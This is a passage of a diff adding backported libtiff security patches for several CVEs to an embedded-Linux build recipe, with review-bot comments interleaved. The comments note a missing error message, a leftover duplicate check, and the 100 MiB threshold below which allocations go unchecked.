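++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
+
+ img.row_offset = row;
+ img.col_offset = 0;
+@@ -3002,6 +3009,14 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 co
+ return( 0 );
+ }
+
++ if (col >= img.width || row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row/col passed to TIFFReadRGBATile().");
++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
++
+ /*
+ * The TIFFRGBAImageGet() function doesn't allow us to get off the
+ * edge of the image, even to fill an otherwise valid tile. So we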
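--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
@@ -0,0 +1,30 @@
+From 1e7d217a323eac701b134afc4ae39b6bdfdbc96a Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 9 Sep 2023 15:45:47 +0200
+Subject: [PATCH] Check also if codec of input image is available,
+ independently from codec check of output image and return with error if not.
+ Fixes #606.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/1e7d217a323eac701b134afc4ae39b6bdfdbc96a]
+CVE: CVE-2023-6228
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 007bd05..d2f7b66 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -628,6 +628,8 @@ tiffcp(TIFF* in, TIFF* out)
+ else
+ CopyField(TIFFTAG_COMPRESSION, compression);
+ TIFFGetFieldDefaulted(in, TIFFTAG_COMPRESSION, &input_compression);
++ if (!TIFFIsCODECConfigured(input_compression))
++ return FALSE;
+ TIFFGetFieldDefaulted(in, TIFFTAG_PHOTOMETRIC, &input_photometric);
+ if (input_compression == COMPRESSION_JPEG) {
+ /* Force conversion to RGB */
+--
+2.25.1
+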
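Review bot: The added `if (!TIFFIsCODECConfigured(input_compression)) return FALSE;` in tiffcp() rejects the input without reporting why, as far as the hunk shows; the other early exits on this page, such as the tiffcp.c guard in CVE-2023-40745.patch, call TIFFError before returning. A line such as `TIFFError(TIFFFileName(in), "Input compression codec is not configured");` ahead of the return would let a user or a log reader tell a rejected codec from any other copy failure, at the cost of diverging from the upstream commit. tiffcp() starts and ends outside the hunk, so what the caller does with the output file on FALSE cannot be checked here.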
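--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
@@ -0,0 +1,191 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . included inttypes.h header to support PRIu32 and PRIu64;
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+ . calls to the check size, that is the idea of the patch, were added before
+ _TIFFCheckMalloc and may note match the original patch methods;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 5320c9d89c054fa805d037d84c57da874470b01a Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 31 Oct 2023 15:43:29 +0000
+Subject: [PATCH] Prevent some out-of-memory attacks
+
+Some small fuzzer files fake large amounts of data and provoke out-of-memory situations. For non-compressed data content / tags, out-of-memory can be prevented by comparing with the file size.
+
+At image reading, data size of some tags / data structures (StripByteCounts, StripOffsets, StripArray, TIFF directory) is compared with file size to prevent provoked out-of-memory attacks.
+
+See issue https://gitlab.com/libtiff/libtiff/-/issues/614#note_1602683857
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-1.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/5320c9d89c054fa805d037d84c57da874470b01a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 92 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 90 insertions(+), 2 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -37,6 +37,7 @@
+ #include "tiffiop.h"
+ #include <float.h>
+ #include <stdlib.h>
++#include <inttypes.h>
+
+ #define FAILED_FII ((uint32) -1)
+
+@@ -863,6 +864,21 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size.
++ */
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
++
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+ return TIFFReadDirEntryErrIo;
+
+@@ -4534,6 +4550,20 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
++
+ if (td->td_stripbytecount_p)
+ _TIFFfree(td->td_stripbytecount_p);
+ td->td_stripbytecount_p = (uint64*)
+@@ -4544,9 +4574,7 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+
+ if (td->td_compression != COMPRESSION_NONE) {
+ uint64 space;
+- uint64 filesize;
+ uint16 n;
+- filesize = TIFFGetFileSize(tif);
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ space=sizeof(TIFFHeaderClassic)+2+dircount*12+4;
+ else
+@@ -4854,6 +4882,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)
+@@ -4957,6 +4999,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ "Sanity check on directory count failed, zero tag directories not supported");
+ return 0;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize,
+ "to read TIFF directory");
+@@ -5000,6 +5056,8 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ }
+ }
+ }
++ /* No check against filesize needed here because "dir" should have same size
++ * than "origdir" checked above. */
+ dir = (TIFFDirEntry*)_TIFFCheckMalloc(tif, dircount16,
+ sizeof(TIFFDirEntry),
+ "to read TIFF directory");
+@@ -5769,7 +5827,20 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+-
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+ _TIFFfree(data);
+@@ -5865,6 +5936,23 @@ static void allocChoppedUpStripArrays(TI
+ }
+ bytecount = last_offset + last_bytecount - offset;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of StripByteCount and StripOffset tags is not greater than
++ * file size.
++ */
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
++
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
+ "for chopped \"StripByteCounts\" array");
+ newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),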
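Review bot: The check added by the second TIFFFetchDirectory hunk (`@@ -4957,6 +4999,20 @@`) is not revisited anywhere else in the series shown on this page: CVE-2023-6277-2.patch and CVE-2023-6277-3.patch only change the first copy, the one following `dircount16 = (uint16)dircount64; dirsize = 20;`. After all four patches this second site therefore still calls `TIFFGetFileSize(tif)` unconditionally and keeps the "greather" spelling, although CVE-2023-6277-3.patch argues that `dircount16 * dirsize` is too small to need any check. It would be worth confirming against the upstream commits whether this copy was meant to be dropped as well. Separately, declarations such as `uint64 filesize = TIFFGetFileSize(tif);` follow statements in their blocks, which needs a C99 compiler mode; the functions involved start and end outside the hunks.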
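--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
@@ -0,0 +1,152 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 0b025324711213a75e38b52f7e7ba60235f108aa Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 19:47:22 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Ammends 5320c9d89c054fa805d037d84c57da874470b01a
+
+This fixes a performance regression caught by the GDAL regression test
+suite.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-2.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/0b025324711213a75e38b52f7e7ba60235f108aa]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 83 +++++++++++++++++++++++++------------------
+ 1 file changed, 48 insertions(+), 35 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -864,19 +864,22 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size.
+- */
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (datasize > filesize)
++ if (datasize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
+- "Requested memory size for tag %d (0x%x) %" PRIu32
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, tag not read",
+- direntry->tdir_tag, direntry->tdir_tag, datasize,
+- filesize);
+- return (TIFFReadDirEntryErrAlloc);
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
+ }
+
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+@@ -4550,18 +4553,22 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ uint64 filesize = 0;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripByteCounts of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return -1;
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greater than filesize %" PRIu64 ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
+ }
+
+ if (td->td_stripbytecount_p)
+@@ -4608,11 +4615,13 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ return -1;
+ space+=datasize;
+ }
++ if (filesize == 0)
++ filesize = TIFFGetFileSize(tif);
+ if( filesize < space )
+- /* we should perhaps return in error ? */
+- space = filesize;
+- else
+- space = filesize - space;
++ /* we should perhaps return in error ? */
++ space = filesize;
++ else
++ space = filesize - space;
+ if (td->td_planarconfig == PLANARCONFIG_SEPARATE)
+ space /= td->td_samplesperpixel;
+ for (strip = 0; strip < td->td_nstrips; strip++)
+@@ -4882,19 +4891,23 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");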
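Review bot: With `if (datasize > 100 * 1024 * 1024)`, and the same test on `allocsize` in the EstimateStripByteCounts and TIFFFetchDirectory hunks here and in both hunks of CVE-2023-6277-4.patch, requests up to 100 MiB are again allocated without being compared with the file size. That is the deliberate trade for the performance regression named in the commit message, but on memory-constrained targets it leaves the out-of-memory condition described in CVE-2023-6277-1.patch reachable below that size, so integrators may want a process memory limit around untrusted TIFF parsing. The literal is repeated at every site; a single named constant with a comment such as `/* allocations at or below this size are not checked against the file size */` would make the limit visible and tunable. In EstimateStripByteCounts, `if (filesize == 0) filesize = TIFFGetFileSize(tif);` uses zero as "not fetched yet", which is harmless for an empty file but deserves a one-line comment.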
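--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
@@ -0,0 +1,46 @@
+Backport of:
+
+From de7bfd7d4377c266f81849579f696fa1ad5ba6c3 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 20:13:45 +0100
+Subject: [PATCH] TIFFFetchDirectory(): remove useless allocsize vs filesize
+ check
+
+CoverityScan rightly points that the max value for dircount16 * dirsize
+is 4096 * 20. That's small enough not to do any check
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-3.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/de7bfd7d4377c266f81849579f696fa1ad5ba6c3]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 18 ------------------
+ 1 file changed, 18 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -4891,24 +4891,6 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- const uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > 100 * 1024 * 1024)
+- {
+- /* Before allocating a huge amount of memory for corrupted files,
+- * check if size of requested memory is not greater than file size.
+- */
+- const uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greater than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
+- }
+- }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)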
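--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
@@ -0,0 +1,94 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From dbb825a8312f30e63a06c272010967d51af5c35a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 21:30:58 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-4.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/dbb825a8312f30e63a06c272010967d51af5c35a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 54 +++++++++++++++++++++++++------------------
+ 1 file changed, 31 insertions(+), 23 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -5822,19 +5822,24 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripArray of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- _TIFFfree(data);
+- return (0);
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+@@ -5935,17 +5940,20 @@ static void allocChoppedUpStripArrays(TI
+ * size of StripByteCount and StripOffset tags is not greater than
+ * file size.
+ */
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
+- "Requested memory size for StripByteCount and "
+- "StripOffsets %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return;
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ if (allocsize > 100 * 1024 * 1024)
++ {
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
+ }
+
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),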
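--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
@@ -0,0 +1,28 @@
+From 561599c99f987dc32ae110370cfdd7df7975586b Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 5 Feb 2022 20:36:41 +0100
+Subject: [PATCH] TIFFReadDirectory(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0562
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 2bbc4585..23194ced 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -4126,7 +4126,8 @@
+ goto bad;
+ }
+
+- memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
++ if (old_extrasamples > 0)
++ memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
+ _TIFFsetShortArray(&tif->tif_dir.td_sampleinfo, new_sampleinfo, tif->tif_dir.td_extrasamples);
+ _TIFFfree(new_sampleinfo);
+ }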
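Review bot: `Upstream-Status: Backport` carries no reference here, unlike the sibling libtiff patches on this page, and the file is named after the commit hash although its header tags `CVE: CVE-2022-0562`. Adding the link, `Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/561599c99f987dc32ae110370cfdd7df7975586b]`, would let a reviewer check the refreshed patch against the commit named in its `From` line. The inner hunk header `@@ -4126,7 +4126,8 @@` has lost its function context, so the enclosing function (TIFFReadDirectory, going by the subject) and the allocation of `new_sampleinfo` are not visible in the hunk.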
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
new file mode 100644
index 0000000000..71b85cac10
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
@@ -0,0 +1,212 @@
1From 87881e093691a35c60b91cafed058ba2dd5d9807 Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Sun, 5 Dec 2021 14:37:46 +0100
4Subject: [PATCH] TIFFReadDirectory: fix OJPEG hack (fixes #319)
5
6to avoid having the size of the strip arrays inconsistent with the
7number of strips returned by TIFFNumberOfStrips(), which may cause
8out-ouf-bounds array read afterwards.
9
10One of the OJPEG hack that alters SamplesPerPixel may influence the
11number of strips. Hence compute tif_dir.td_nstrips only afterwards.
12
13CVE: CVE-2022-1354
14
15Upstream-Status: Backport
16[https://gitlab.com/libtiff/libtiff/-/commit/87f580f39011109b3bb5f6eca13fac543a542798]
17
18Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
19---
20 libtiff/tif_dirread.c | 162 ++++++++++++++++++++++--------------------
21 1 file changed, 83 insertions(+), 79 deletions(-)
22
23diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
24index 8f434ef5..14c031d1 100644
25--- a/libtiff/tif_dirread.c
26+++ b/libtiff/tif_dirread.c
27@@ -3794,50 +3794,7 @@ TIFFReadDirectory(TIFF* tif)
28 MissingRequired(tif,"ImageLength");
29 goto bad;
30 }
31- /*
32- * Setup appropriate structures (by strip or by tile)
33- */
34- if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
35- tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
36- tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
37- tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
38- tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
39- tif->tif_flags &= ~TIFF_ISTILED;
40- } else {
41- tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
42- tif->tif_flags |= TIFF_ISTILED;
43- }
44- if (!tif->tif_dir.td_nstrips) {
45- TIFFErrorExt(tif->tif_clientdata, module,
46- "Cannot handle zero number of %s",
47- isTiled(tif) ? "tiles" : "strips");
48- goto bad;
49- }
50- tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
51- if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
52- tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
53- if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
54-#ifdef OJPEG_SUPPORT
55- if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
56- (isTiled(tif)==0) &&
57- (tif->tif_dir.td_nstrips==1)) {
58- /*
59- * XXX: OJPEG hack.
60- * If a) compression is OJPEG, b) it's not a tiled TIFF,
61- * and c) the number of strips is 1,
62- * then we tolerate the absence of stripoffsets tag,
63- * because, presumably, all required data is in the
64- * JpegInterchangeFormat stream.
65- */
66- TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
67- } else
68-#endif
69- {
70- MissingRequired(tif,
71- isTiled(tif) ? "TileOffsets" : "StripOffsets");
72- goto bad;
73- }
74- }
75+
76 /*
77 * Second pass: extract other information.
78 */
79@@ -4042,41 +3999,6 @@ TIFFReadDirectory(TIFF* tif)
80 } /* -- if (!dp->tdir_ignore) */
81 } /* -- for-loop -- */
82
83- if( tif->tif_mode == O_RDWR &&
84- tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
85- tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
86- tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
87- tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
88- tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
89- tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
90- tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
91- tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
92- {
93- /* Directory typically created with TIFFDeferStrileArrayWriting() */
94- TIFFSetupStrips(tif);
95- }
96- else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
97- {
98- if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
99- {
100- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
101- tif->tif_dir.td_nstrips,
102- &tif->tif_dir.td_stripoffset_p))
103- {
104- goto bad;
105- }
106- }
107- if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
108- {
109- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
110- tif->tif_dir.td_nstrips,
111- &tif->tif_dir.td_stripbytecount_p))
112- {
113- goto bad;
114- }
115- }
116- }
117-
118 /*
119 * OJPEG hack:
120 * - If a) compression is OJPEG, and b) photometric tag is missing,
121@@ -4147,6 +4069,88 @@ TIFFReadDirectory(TIFF* tif)
122 }
123 }
124
125+ /*
126+ * Setup appropriate structures (by strip or by tile)
127+ * We do that only after the above OJPEG hack which alters SamplesPerPixel
